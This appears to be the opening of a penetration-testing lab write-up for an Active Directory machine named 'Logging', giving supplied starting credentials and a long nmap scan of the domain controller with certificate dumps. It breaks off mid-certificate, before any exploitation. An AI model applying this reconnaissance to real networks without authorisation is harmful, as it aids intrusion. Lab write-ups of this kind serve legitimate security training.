18 July 2026

Logging

by 0xW1LD

As is common in real life pentests, you will start the Logging box with credentials for the following account wallace.everette / Welcome2026@

Enumeration

Scans

As usual we start off with an nmap port scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
PORT      STATE  SERVICE       REASON          VERSION
53/tcp    open   domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open   http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open   kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-04-19 10:12:37Z)
135/tcp   open   msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open   netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open   ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after:  2106-04-17T03:20:01
| MD5:     8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1:   8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
|_ssl-date: 2026-04-19T10:14:13+00:00; +6h59m48s from scanner time.
445/tcp   open   microsoft-ds? syn-ack ttl 127
464/tcp   open   kpasswd5?     syn-ack ttl 127
593/tcp   open   ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open   ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after:  2106-04-17T03:20:01
| MD5:     8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1:   8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
|_ssl-date: 2026-04-19T10:14:14+00:00; +6h59m48s from scanner time.
3268/tcp  open   ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-19T10:14:13+00:00; +6h59m48s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after:  2106-04-17T03:20:01
| MD5:     8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1:   8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
3269/tcp  open   ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-19T10:14:14+00:00; +6h59m48s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after:  2106-04-17T03:20:01
| MD5:     8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1:   8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
5985/tcp  open   http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp  open   http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
8531/tcp  open   ssl/unknown   syn-ack ttl 127
| ssl-cert: Subject: commonName=DC01.logging.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.logging.htb
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-16T15:12:07
| Not valid after:  2027-04-16T15:12:07
| MD5:     3158 19e2 be3b 095d 5781 5715 4aaf 73e6
| SHA-1:   9416 b3bc 64b6 7aa6 fe63 8a37 9b4e d9d4 c66b e3c5
| SHA-256: 28b7 cd3c bef5 4d45 e326 d24f f976 0088 07f6 3f90 8408 e5a3 ed59 671d 1b71 4df6
| -----BEGIN CERTIFICATE-----
| MIIHMDCCBRigAwIBAgITFAAAAAK/v9b9j2G/FwAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMB4XDTI2MDQxNjE1MTIwN1oXDTI3
| MDQxNjE1MTIwN1owGzEZMBcGA1UEAxMQREMwMS5sb2dnaW5nLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAMBe7NjYZsfoS/+TNDMoC2h86D/h6vza
| gZIdynR8hHo43pk/51TgSl21MRGg0F5I3C7l3CiJVN+n/2DQ46zLVBmz2zQ7igA4
| oui4Dy0hUP4a9ez79gKfNvqymPpmO17pkIa4UZtRSZsT6omvTnR1ocvbCfk2qx3c
| VivpA1JVFp8/QTEEa1N+Y9P90YIu7yc6qLHCTsepeiD5Le0c+sPEYFNMsGevRaY8
| ZvQofpRKnGKMu7ixxxPL2f/nGmUZWZSV5dlmmJayu4051Qmmxy4if1irDNCFCs2b
| fYH/geF1J8WnQOR90/pLvTc3+Q9+Nrs2lTfDXqCOx1eAKTvzAY51bz0CAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFB2CJCYz
| 4cC12YnHPnPk1FnY99KaMB8GA1UdIwQYMBaAFL7JMlWq5YFTEUODjRfLNicn8Ryl
| MIHKBgNVHR8EgcIwgb8wgbyggbmggbaGgbNsZGFwOi8vL0NOPWxvZ2dpbmctREMw
| MS1DQSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQ9WcY
| keHaIU6dyb3PsglnCoIQREMwMS5sb2dnaW5nLmh0YjBPBgkrBgEEAYI3GQIEQjBA
| oD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtNDAyMDgyMzgxNS0yNzk2NTI5NDg5
| LTE2ODIxNzA1NTItMTAwMDANBgkqhkiG9w0BAQsFAAOCAgEAkj6q2guKnFi36ysz
